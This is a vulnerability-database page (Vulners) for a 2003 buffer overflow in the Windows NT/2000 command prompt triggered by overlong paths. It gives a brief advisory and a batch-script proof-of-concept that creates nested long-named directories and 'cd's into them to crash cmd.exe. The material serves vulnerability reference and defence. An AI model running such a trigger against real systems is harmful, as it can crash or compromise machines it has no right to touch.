Vulners
Lucene search
Microsoft Windows NT/2000 - 'cmd.exe' CD Buffer Overflow (PoC)
source: https://www.securityfocus.com/bid/6829/info
The Windows NT and 2000 command prompt (cmd.exe) does not properly handle paths containing more than 256 characters. If the cd (change directory) command is used to change to a subdirectory resulting in a path with more than 256 characters, a buffer is overrun. This could lead to cmd.exe failing with the possibility of code execution on Windows NT 4.0 systems. Automated scripts that traverse and preform operations on arbitrary directories are particularly vulnerable.
On Windows 2000 systems, cmd.exe will become 'jailed' in the directory.
@echo off
SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%B%c:
cd cd AAAAAAAAAAAA*
cd AAAAAAAAAAAA*
cd BBBBBBBBBBBB*
cd .. Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Feb 2003 00:00Current
7.4High risk
Vulners AI Score7.4